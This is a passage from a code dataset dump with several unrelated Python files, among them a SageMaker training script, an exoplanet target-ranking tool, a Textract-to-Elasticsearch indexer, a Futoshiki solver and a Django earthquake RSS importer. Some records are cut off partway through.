if\n for c1 you are in case ii then for c1 + 1 you will be in case ii\n or iii but not i\n\n \"\"\"\n # Parameters\n d_min = 1.0\n d_max = 5.0\n # Initialize Values\n c = 0\n while True:\n # Calculate values\n alpha = np.array([1.0 - spstats.poisson.cdf(c, lbd0 * T)])\n beta_max = np.array([spstats.poisson.cdf(c, lbd0 * d_min * T)])\n beta_min = np.array([spstats.poisson.cdf(c, lbd0 * d_max * T)])\n # Select best case for this iteration\n alpha_opt_i = alpha\n if alpha < beta_min:\n d_opt_i = d_max\n beta_opt_i = beta_min\n diff_opt_i = np.abs(alpha_opt_i - beta_opt_i)\n elif alpha > beta_max:\n d_opt_i = d_min\n beta_opt_i = beta_max\n diff_opt_i = np.abs(alpha_opt_i - beta_opt_i)\n else:\n beta_opt_i = alpha\n def beta_root(d):\n return spstats.poisson.cdf(c, lbd0 * d * T) - beta_opt_i\n d_opt_i = spopt.brentq(beta_root, d_min, d_max)\n diff_opt_i = 0.0\n\n # Select best results overall\n if 'c_opt' not in locals():\n c_opt = c\n d_opt = d_opt_i\n alpha_opt = alpha_opt_i\n beta_opt = beta_opt_i\n diff_opt = diff_opt_i\n else:\n # Check if the solution in the current step has equal risk\n if np.allclose(diff_opt_i, 0.0):\n if alpha_opt_i < alpha_opt:\n c_opt = c\n d_opt = d_opt_i\n alpha_opt = alpha_opt_i\n beta_opt = beta_opt_i\n diff_opt = diff_opt_i\n elif diff_opt_i < diff_opt:\n c_opt = c\n d_opt = d_opt_i\n alpha_opt = alpha_opt_i\n beta_opt = beta_opt_i\n diff_opt = diff_opt_i\n\n # This is the condition to break out the loop\n if alpha >= beta_min:\n c += 1\n else:\n break\n return c_opt, d_opt, alpha_opt[0], beta_opt[0]\n", "sub_path": "ramtools/demonstration.py", "file_name": "demonstration.py", "file_ext": "py", "file_size_in_byte": 3447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 47, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 48, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 49, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.stats.poisson.cdf", "line_number": 63, "usage_type": "call"}, {"api_name": "scipy.stats.poisson", "line_number": 63, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 63, "usage_type": "name"}, {"api_name": "scipy.optimize.brentq", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.allclose", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "190689234", "text": "\nimport os\nimport logging\nimport torch\nimport argparse\n\nfrom typing import Union\nfrom pathlib import Path\n\nfrom gen_utils import set_logger_defaults\nfrom models import PyTorchModel\nfrom trainer import 
Trainer\n\nlogger = logging.getLogger(__name__)\nset_logger_defaults(logger)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\n '--output_data_dir', '-o', type=str, \n default=os.environ['SM_OUTPUT_DATA_DIR']\n )\n parser.add_argument(\n '--model_dir', '-m', type=str, \n default=os.environ['SM_MODEL_DIR']\n )\n parser.add_argument(\n '--train_dir', '-t', type=str, \n default=os.environ['SM_CHANNEL_TRAIN_DIR']\n )\n parser.add_argument(\n '--val_dir', '-v', type=str, \n default=os.environ['SM_CHANNEL_VAL_DIR']\n )\n \n parser.add_argument('--outcome', '-O', type=str, default='first_sold_price')\n parser.add_argument('--batch_size', '-b', type=int, default=64)\n parser.add_argument('--epochs', '-e', type=int, default=10)\n \n args = parser.parse_args()\n \n logger.info(f'command-line args: {args}')\n \n trainer = Trainer()\n trainer.make_data_loader(\n which_loader='train', path=args.train_dir, batch_size=args.batch_size, \n outcome=args.outcome, concat_all=True, data_file=None\n )\n x_tab_input_dim, x_text_input_dim, x_img_input_dim = trainer.get_input_dims()\n \n model = PyTorchModel(x_tab_input_dim, x_text_input_dim, x_img_input_dim)\n \n trainer.make_data_loader(\n which_loader='val', path=args.val_dir, batch_size=args.batch_size,\n outcome=args.outcome, concat_all=True, data_file=None\n )\n \n model_params_path = args.model_dir + '/model_params.pt'\n \n trainer.set_model(\n model=model, loss_func_cls=torch.nn.L1Loss, \n optimizer_cls=torch.optim.Adam, lr=1e-5\n )\n trainer.train(epochs=args.epochs)\n \n with open(model_params_path, 'wb') as file:\n torch.save(trainer.model.cpu().state_dict(), file)\n logger.info(f'Model state_dict saved to {model_params_path}')\n\n", "sub_path": "model/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2114, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "gen_utils.set_logger_defaults", "line_number": 15, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "trainer.Trainer", "line_number": 46, "usage_type": "call"}, {"api_name": "trainer.make_data_loader", "line_number": 47, "usage_type": "call"}, {"api_name": "trainer.get_input_dims", "line_number": 51, "usage_type": "call"}, {"api_name": "models.PyTorchModel", "line_number": 53, "usage_type": "call"}, {"api_name": "trainer.make_data_loader", "line_number": 55, "usage_type": "call"}, {"api_name": "trainer.set_model", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 64, "usage_type": "attribute"}, {"api_name": "trainer.train", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 69, "usage_type": "call"}, {"api_name": "trainer.model.cpu", "line_number": 69, "usage_type": "call"}, {"api_name": "trainer.model", "line_number": 69, "usage_type": "attribute"}]} +{"seq_id": "163449337", "text": "'''\nThis script uses functions from X_ranking.py to create an initial target list to\ninput to the TKS 
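Aside: the argparse defaults in the train.py record above read SageMaker's injected environment variables, so a quick local smoke test has to supply them by hand. A hypothetical invocation (all paths are made up; the variable names simply mirror the record's argparse defaults):

import os
import subprocess

# SageMaker would normally set these inside the training container.
env = dict(os.environ,
           SM_OUTPUT_DATA_DIR='/tmp/output',
           SM_MODEL_DIR='/tmp/model',
           SM_CHANNEL_TRAIN_DIR='/tmp/data/train',
           SM_CHANNEL_VAL_DIR='/tmp/data/val')
subprocess.run(['python', 'train.py', '--epochs', '2', '--batch_size', '32'],
               env=env, check=True)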
prioritization algorithm. It ranks targets based on the \"X\" metric,\nwhich is the ratio of the target's TSM and t_HIRES, the expected total exposure\ntime needed to achieve a 5-sigma mass measurement on the system.\n\nNotes:\n - Right now (03/24/20), the program does not incorporate information from Jump.\n Though, information that would be useful to have from Jump includes:\n - The number of observations a target already has, so we can deduct the\n proper amount of time from t_HIRES since these targets have a \"head start\"\n - Parameters used for prior observations e.g.\n - N_shots (number of shots be observation)\n - exposure_meter_target (target number of exposure meter counts)\n - If a target already has RVs, an estimate of the typical RV measurement\n precision, measured from the error bars on the RV points themselves.\n - If a target already has a mass measurement from RadVel, an updated calculation\n of t_HIRES, extrapolated from the number of current observations and\n SNR of the mass measurement.\n - The first two bullet points can be gathered from data using an SQL\n query to Jump. Getting the actual mass precision would be a little\n more involved because it's not already in a Jump database. Maybe,\n since there aren't all that many prioritized targets, these measurements\n could be collated by hand in a .csv somewhere.\n'''\n# System\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom X_ranking import get_target_list\n\n# Command line arguments. For most uses, the defaults will be fine.\nparser = argparse.ArgumentParser(description='Rank targets in selected_TOIs.')\nparser.add_argument('save_fname', type=str, default=None, help='File save path for output.')\nparser.add_argument('--save_folder', type=str, default='data/sc3_target_lists/', help='Folder where the output will be saved.')\nparser.add_argument('--toi_folder', type=str, default='data/toi/', help='Folder with toi+ lists.')\nparser.add_argument('--tic_folder', type=str, default='data/exofop/', help='Folder with TIC info.')\nparser.add_argument('--selected_TOIs_folder', type=str, default='data/TKS/', help='Folder with selected_TOIs csv.')\nparser.add_argument('--include_qlp', type=str, default='False', help='Include QLP TOIs in ranking algorithm?')\nparser.add_argument('--verbose', type=str, default='True', help='Print additional messages during target list generation?')\nparser.add_argument('--num_to_rank', type=str, default='5', help='Number of targets to assign priorities to per bin.')\nparser.add_argument('--k_amp_cut', type=float, default=0., help='Minimum expected K-amplitude that targets must have to make the final list.')\nparser.add_argument('--min_TSM', type=float, default=0., help='Minimum TSM value that targets must have to make the final list.')\n\ndef save_to_csv(df, save_fname, save_folder):\n '''\n Save the df to file.\n '''\n df.to_csv(save_folder + save_fname)\n print('The target list was saved to {}.'.format(save_fname))\n\ndef mark_vip_targets(df, vip_fname):\n '''\n Add a column to the DataFrame signifying a VIP priority for certain targets that\n we want to send directly to the top of our priority list, regardless of other\n sorting methods.\n '''\n if vip_fname is not '':\n vip_list = np.loadtxt(vip_fname, dtype=str)\n data = zip(vip_list, np.arange(1, len(vip_list)+1))\n cols = ['cps', 'vip_rank']\n vip_df = pd.DataFrame(data, columns=cols)\n\n # Merge the X_tois_df with the vip_df while preserving the indexes on the X_tois_df, which contain binning info\n 
return df.reset_index().merge(vip_df, how='left', left_on='cps', right_on='cps').set_index(df.index.names)\n else:\n df['vip_rank'] = np.nan # Make vip_rank column empty is no file given\n return df\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n save_fname = args.save_fname\n save_folder = args.save_folder\n toi_folder = args.toi_folder\n tic_folder = args.tic_folder\n selected_TOIs_folder = args.selected_TOIs_folder\n num_to_rank = int(args.num_to_rank)\n k_amp_cut = float(args.k_amp_cut)\n min_TSM = float(args.min_TSM)\n\n # Convert these optional arguments to other data types, if they're specified.\n include_qlp_str = args.include_qlp\n assert include_qlp_str.lower() in ['false', 'true'], '--include_qlp must be either True or False'\n include_qlp = False\n if include_qlp_str.lower() == 'false':\n include_qlp = False\n elif include_qlp_str.lower() == 'true':\n include_qlp = True\n\n verbose_str = args.verbose\n assert verbose_str.lower() in ['false', 'true'], '--verbose must be either True or False'\n verbose = None\n if verbose_str.lower() == 'false':\n verbose = False\n elif verbose_str.lower() == 'true':\n verbose = True\n\n # Get the initial target list\n print('Generating initial target list...')\n print('')\n X_tois_df = get_target_list(save_fname=None, toi_folder=toi_folder, tic_folder=tic_folder, selected_TOIs_folder=selected_TOIs_folder, include_qlp=include_qlp, verbose=verbose, num_to_rank=num_to_rank, k_amp_cut=k_amp_cut, min_TSM=min_TSM)\n print('----------')\n\n # Add VIP targets\n print('Would you like to mark VIP targets that will get selected first? y/n')\n vip_yn_valid = False\n while not vip_yn_valid:\n vip_yn = input().lower()\n if vip_yn in ['yes', 'y']:\n vip_yn_valid = True\n sys.stdout.write(\"Provide the path to the .txt file with your VIP targets' CPS IDs listed one per row, in order of highest VIP to lowest: \")\n vip_path_valid = False\n while not vip_path_valid:\n vip_fname = input()\n if os.path.exists(vip_fname):\n vip_path_valid = True\n else:\n print('')\n print('That is not a valid path, enter another...')\n X_tois_df = mark_vip_targets(X_tois_df, vip_fname)\n save_to_csv(X_tois_df, save_fname, save_folder)\n elif vip_yn in ['no', 'n']:\n vip_yn_valid = True\n X_tois_df = mark_vip_targets(X_tois_df, '') # Add the vip_rank column but leave it empty\n save_to_csv(X_tois_df, save_fname, save_folder)\n else:\n print('Please enter yes or no...')\n print('----------')\n", "sub_path": "target_list_script.py", "file_name": "target_list_script.py", "file_ext": "py", "file_size_in_byte": 6601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 70, "usage_type": "attribute"}, {"api_name": "X_ranking.get_target_list", "line_number": 105, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 115, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}]} +{"seq_id": "193054941", "text": "import json\nfrom helper import FileHelper, S3Helper\nfrom trp import 
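Aside: two notes on mark_vip_targets in the target-list record above. First, `if vip_fname is not '':` tests identity rather than equality (recent CPython versions emit a SyntaxWarning for it); `if vip_fname != '':` is the reliable spelling. Second, the reset_index/merge/set_index dance is what carries the binning index through the merge; a toy demonstration with invented targets:

import pandas as pd

df = pd.DataFrame({'cps': ['T001', 'T002'], 'tsm': [80.0, 55.0]},
                  index=pd.Index(['bin1', 'bin2'], name='priority_bin'))
vip_df = pd.DataFrame({'cps': ['T002'], 'vip_rank': [1]})
merged = (df.reset_index()
            .merge(vip_df, how='left', left_on='cps', right_on='cps')
            .set_index(df.index.names))
print(merged)   # T002 carries vip_rank 1, T001 gets NaN, and priority_bin survives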
Document\nimport boto3\nfrom elasticsearch import Elasticsearch, RequestsHttpConnection\nfrom requests_aws4auth import AWS4Auth\nfrom datetime import datetime\n\nclass OutputGenerator:\n def __init__(self, documentId, response, bucketName, objectName, forms, tables, ddb):\n self.documentId = documentId\n self.response = response\n self.bucketName = bucketName\n self.objectName = objectName\n self.forms = forms\n self.tables = tables\n self.ddb = ddb\n\n self.outputPath = \"{}-analysis/{}/\".format(objectName, documentId)\n\n self.document = Document(self.response)\n\n def indexDocument(self, bucketName, opath, text):\n objectName = self.objectName;\n items = objectName.rsplit('/', 1)\n if len(items) > 1:\n name = objectName.rsplit('/', 1)[1]\n elif len(items) == 1:\n name = objectName.rsplit('/', 1)[0]\n elif len(items) >=0:\n name = \"UNKNOWN-2019010101\"\n\n parts = name.split('_')[0];\n print(parts)\n claimId = parts.split('-')[0]\n if len(parts.split('-'))==1:\n date = \"20190101\"\n elif len(parts.split('-')) > 1:\n date = parts.split('-')[1][0:8]\n\n\n # Update host with endpoint of your Elasticsearch cluster\n #host = \"search--xxxxxxxxxxxxxx.us-east-1.es.amazonaws.com\n host = \"search-custom-e4gpteganu5jmvurcd7xymc4hi.us-east-1.es.amazonaws.com\"\n region = 'us-east-1'\n\n if(text):\n service = 'es'\n ss = boto3.Session()\n credentials = ss.get_credentials()\n region = ss.region_name\n\n awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\n\n es = Elasticsearch(\n hosts = [{'host': host, 'port': 443}],\n http_auth = awsauth,\n use_ssl = True,\n verify_certs = True,\n connection_class = RequestsHttpConnection\n )\n s3path = \"https://\"+bucketName+\".s3.amazonaws.com/\"+objectName\n\n document = {\n \"name\": \"{}\".format(objectName),\n \"bucket\" : \"{}\".format(bucketName),\n \"content\" : text,\n \"claimid\" : claimId,\n \"date\" : date,\n \"s3path\" : s3path,\n \"fileName\": name\n }\n\n es.index(index=\"textract\", doc_type=\"document\", id=opath, body=document)\n\n print(\"Indexed document\")\n\n def saveItem(self, pk, sk, output):\n\n jsonItem = {}\n jsonItem['documentId'] = pk\n jsonItem['outputType'] = sk\n jsonItem['outputPath'] = output\n\n self.ddb.put_item(Item=jsonItem)\n\n def _outputText(self, page, p):\n #text = page.text\n text = page.getTextInReadingOrder()\n opath = \"{}page-{}-text.txt\".format(self.outputPath, p)\n S3Helper.writeToS3(text, self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Text\".format(p), opath)\n self.indexDocument(self.bucketName, opath, text)\n\n # textInReadingOrder = page.getTextInReadingOrder()\n # opath = \"{}page-{}-text-inreadingorder.txt\".format(self.outputPath, p)\n # S3Helper.writeToS3(textInReadingOrder, self.bucketName, opath)\n # self.saveItem(self.documentId, \"page-{}-TextInReadingOrder\".format(p), opath)\n\n def _outputForm(self, page, p):\n csvData = []\n for field in page.form.fields:\n csvItem = []\n if(field.key):\n csvItem.append(field.key.text)\n else:\n csvItem.append(\"\")\n if(field.value):\n csvItem.append(field.value.text)\n else:\n csvItem.append(\"\")\n csvData.append(csvItem)\n csvFieldNames = ['Key', 'Value']\n opath = \"{}page-{}-forms.csv\".format(self.outputPath, p)\n S3Helper.writeCSV(csvFieldNames, csvData, self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Forms\".format(p), opath)\n\n def _outputTable(self, page, p):\n\n csvData = []\n for table in page.tables:\n csvRow = []\n 
csvRow.append(\"Table\")\n csvData.append(csvRow)\n for row in table.rows:\n csvRow = []\n for cell in row.cells:\n csvRow.append(cell.text)\n csvData.append(csvRow)\n csvData.append([])\n csvData.append([])\n\n opath = \"{}page-{}-tables.csv\".format(self.outputPath, p)\n S3Helper.writeCSVRaw(csvData, self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Tables\".format(p), opath)\n\n def run(self):\n\n if(not self.document.pages):\n return\n\n opath = \"{}response.json\".format(self.outputPath)\n S3Helper.writeToS3(json.dumps(self.response), self.bucketName, opath)\n self.saveItem(self.documentId, 'Response', opath)\n\n print(\"Total Pages in Document: {}\".format(len(self.document.pages)))\n\n docText = \"\"\n\n p = 1\n for page in self.document.pages:\n\n opath = \"{}page-{}-response.json\".format(self.outputPath, p)\n S3Helper.writeToS3(json.dumps(page.blocks), self.bucketName, opath)\n self.saveItem(self.documentId, \"page-{}-Response\".format(p), opath)\n\n self._outputText(page, p)\n\n docText = docText + page.text + \"\\n\"\n\n if(self.forms):\n self._outputForm(page, p)\n\n if(self.tables):\n self._outputTable(page, p)\n\n p = p + 1", "sub_path": "textract-pipeline/lambda/textractor/python/og.py", "file_name": "og.py", "file_ext": "py", "file_size_in_byte": 5701, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "trp.Document", "line_number": 21, "usage_type": "call"}, {"api_name": "boto3.Session", "line_number": 49, "usage_type": "call"}, {"api_name": "requests_aws4auth.AWS4Auth", "line_number": 53, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 56, "usage_type": "call"}, {"api_name": "elasticsearch.RequestsHttpConnection", "line_number": 61, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeToS3", "line_number": 92, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 92, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeCSV", "line_number": 116, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 116, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeCSVRaw", "line_number": 135, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 135, "usage_type": "name"}, {"api_name": "helper.S3Helper.writeToS3", "line_number": 144, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 144, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 144, "usage_type": "call"}, {"api_name": "helper.S3Helper.writeToS3", "line_number": 155, "usage_type": "call"}, {"api_name": "helper.S3Helper", "line_number": 155, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "557002269", "text": "# Template for the algorithm to solve a Futoshiki. Builds a recursive backtracking solution\n# that branches on possible values that could be placed in the next empty cell. 
\n# Initial pruning of the recursion tree - \n# we don't continue on any branch that has already produced an inconsistent solution\n# we stop and return a complete solution once one has been found\n\nimport pygame, Snapshot, Cell, Futoshiki_IO,time,os\n\ndef solve(snapshot, screen):\n # display current snapshot\n Futoshiki_IO.displayPuzzle(snapshot, screen)\n pygame.display.flip()\n unequlitys=snapshot.getConstraints()\n less={}\n greater={}\n for x in unequlitys:\n if(x[1] in greater.keys()):\n greater[x[1]].append(x[0])\n else:\n greater[x[1]]=[x[0]]\n\n if (x[0] in less.keys()):\n less[x[0]].append(x[1])\n else:\n less[x[0]] = [x[1]]\n\n print(greater)\n print(less)\n\n def printG(f):\n for x in f:\n print(x)\n print(\"--------------\")\n\n\n def minVal(grid,x,y):\n if((x,y) in greater.keys()):\n gr8=greater[(x,y)]\n vals=[]\n # print(\"-- mins\")\n for i in gr8:\n # print(x)\n vals.append(grid[i[0]][i[1]])\n # print(grid[x[0]][x[1]])\n # print(vals)\n\n return (max(vals))\n\n else:\n return 0\n\n def maxVal(grid,x,y):\n if((x,y)in less.keys()):\n les=less[(x,y)]\n # print(\"-- maxs\")\n vals=[]\n for i in les:\n t=grid[i[0]][i[1]]\n if(t>0):\n vals.append(grid[i[0]][i[1]])\n # print(vals)\n # print(min(vals))\n if(len(vals)!=0):\n men = min(vals)\n return men\n return 6\n\n\n def gridtosnap(grid):\n for x in range(5):\n for y in range(5):\n snapshot.setCellVal(x, y,grid[x][y])\n Futoshiki_IO.displayPuzzle(snapshot, screen)\n\n def possibleEntries(board, i, j):#returns valid values\n\n possibilityArray = {}\n\n for x in range(1, 6):\n possibilityArray[x] = 0\n\n # For horizontal entries\n for y in range(0, 5):\n if not board[i][y] == 0:\n possibilityArray[board[i][y]] = 1\n\n # For vertical entries\n for x in range(0, 5):\n if not board[x][j] == 0:\n possibilityArray[board[x][j]] = 1\n\n\n\n for x in range(1, 6):\n if possibilityArray[x] == 0:\n possibilityArray[x] = x\n else:\n possibilityArray[x] = 0\n\n return possibilityArray\n\n def FSolver(board):#recursive function\n\n # printG()\n i = 0\n j = 0\n\n possiblities = {}\n\n # if board is full, there is no need to solve it any furtherbreak\n if isComplete(board):\n print(\"Board Solved Successfully!\")\n\n gridtosnap(grid)\n Futoshiki_IO.displayPuzzle(snapshot, screen)\n pygame.display.flip()\n\n\n\n return True\n else:\n # find the first vacant spot\n for x in range(4, -1,-1):\n for y in range(0,5):\n if board[x][y] == 0:\n i = x\n j = y\n break\n\n\n\n # get all the possibilities for i,j\n possiblities = possibleEntries(board, i, j)\n\n # go through all the possibilities and call the the function\n # again and again\n une=[]\n\n min = minVal(grid,i,j)\n max = maxVal(grid,i,j)\n for x in range(1, 6):\n\n if not possiblities[x] == 0 and x>min and x 1448482991 and pi0_id < 1453321409;')\ndeviceData = sqlCursor.fetchall()\n\nlTime = []\nlRate = []\n\n\nfor i, row in enumerate(deviceData):\n\tif float(row[1]) < 800:\n\t\tcontinue\n\tlTime.append(float(row[0]))\n\tlRate.append(float(row[1]))\n\nnumPoints = len(lTime)\naTime = np.asarray(lTime)\naRate = np.asarray(lRate)\n\nc1 = Canvas()\n\ngRate = root.TGraph(numPoints, aTime, aRate)\ngRate.Draw('AP')\n\n\nc1.Update()\n\nraw_input('Press enter to continue...')\n\n\n", "sub_path": "nr/time_dependence/rate_analysis.py", "file_name": "rate_analysis.py", "file_ext": "py", "file_size_in_byte": 988, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "MySQLdb.connect", "line_number": 18, "usage_type": "call"}, {"api_name": 
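The Futoshiki record above is truncated: the text jumps mid-expression from `x>min and x` into an unrelated SQL literal, taking the tail of FSolver and the isComplete helper with it. Purely as a hypothetical reconstruction (not the original author's code), isComplete only needs to report whether any of the 25 cells still holds the placeholder 0:

def isComplete(board):
    # Assumed semantics: a 5x5 board is complete when no cell is 0.
    return all(board[x][y] != 0 for x in range(5) for y in range(5))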
"numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 37, "usage_type": "call"}, {"api_name": "rootpy.plotting.Canvas", "line_number": 39, "usage_type": "call"}, {"api_name": "ROOT.TGraph", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "119795658", "text": "import re\nfrom datetime import datetime\nfrom xml.etree import ElementTree\n\nimport requests\nfrom django.core.management import BaseCommand\nfrom django.utils.timezone import make_aware\n\nfrom earthquake_visualizer.models import EarthQuakeFeed\n\nURI = r'https://www.emsc.eu/service/rss/rss.php?typ=emsc&min_lat=10&min_long=-30&max_long=65'\nPRIMARY_KEY_REGEX = re.compile(r'https://www.emsc.eu/Earthquake/earthquake\\.php\\?id=(\\d*)')\nMAGNITUDE_REGEX = re.compile(r'.*(\\d\\.\\d)')\nCOUNTRY = 'CROATIA'\n\n\ndef _get_pk(link):\n return int(PRIMARY_KEY_REGEX.findall(link)[0])\n\n\ndef _get_magnitude(magnitude):\n return MAGNITUDE_REGEX.findall(magnitude)[0]\n\n\ndef _get_time(time):\n return make_aware(datetime.strptime(time, \"%Y-%m-%d %H:%M:%S %Z\"))\n\n\ndef _parse_feed(rss_feed):\n namespace = {\n 'geo': 'http://www.w3.org/2003/01/geo/',\n 'emsc': 'https://www.emsc.eu'\n }\n root = ElementTree.fromstring(rss_feed.text)\n for item in root.iter('item'):\n yield {\n 'id': _get_pk(item.find('link').text),\n 'title': item.find('title').text,\n 'latitude': item.find('geo:lat', namespace).text,\n 'longitude': item.find('geo:long', namespace).text,\n 'magnitude': _get_magnitude(item.find('emsc:magnitude', namespace).text),\n 'time': _get_time(item.find('emsc:time', namespace).text)\n }\n\n\nclass Command(BaseCommand):\n help = 'Retrieves rss feed data and updates the database.'\n\n def handle(self, *args, **options):\n rss_feed = requests.get(URI)\n if rss_feed.status_code != requests.codes.OK:\n self.stderr.write('rss feed data unavailable')\n return\n\n created, updated = 0, 0\n for item in _parse_feed(rss_feed):\n # if COUNTRY not in item['title']:\n # continue\n try:\n obj = EarthQuakeFeed.objects.get(id=item['id'])\n for key, value in item.items():\n setattr(obj, key, value)\n obj.save()\n updated += 1\n except EarthQuakeFeed.DoesNotExist:\n EarthQuakeFeed.objects.create(**item)\n created += 1\n self.stdout.write(f'Created {created}, updated {updated} records')\n", "sub_path": "earthquake_visualizer/management/commands/rssfeed.py", "file_name": "rssfeed.py", "file_ext": "py", "file_size_in_byte": 2261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 34, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 34, "usage_type": "name"}, {"api_name": "django.core.management.BaseCommand", "line_number": 46, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 51, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects.get", "line_number": 60, "usage_type": "call"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects", 
"line_number": 60, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed", "line_number": 60, "usage_type": "name"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.DoesNotExist", "line_number": 65, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed", "line_number": 65, "usage_type": "name"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects.create", "line_number": 66, "usage_type": "call"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "earthquake_visualizer.models.EarthQuakeFeed", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "391676807", "text": "# Copyright 2016 SDNMAX, Inc.\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom flask import abort\n\nfrom yacore import db\nfrom yacore.fabric.models import DockerContainer\n\n\nclass YABGPContainer(DockerContainer):\n \"\"\" yabgp Docker containers\"\"\"\n __tablename__ = 'yabgp_container'\n id = db.Column(db.Integer, db.ForeignKey('docker_container.id'), primary_key=True)\n remote_addr = db.Column(db.Integer)\n __mapper_args__ = {\n 'polymorphic_identity': 'yabgp',\n }\n\n @staticmethod\n def create(data):\n \"\"\"Create a fabric host.\"\"\"\n yabgp_container = YABGPContainer()\n yabgp_container.from_dict(data)\n return yabgp_container\n\n def from_dict(self, data):\n \"\"\"Import fabric host data from a dictionary.\"\"\"\n for field in ['container_id', 'container_name', 'fabhost_id'\n 'remote_addr', 'local_addr', 'remote_as', 'local_as']:\n try:\n setattr(self, field, data[field])\n except KeyError:\n abort(400)\n", "sub_path": "yacore/fabric/container/yabgp/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1585, "program_lang": "python", "lang": 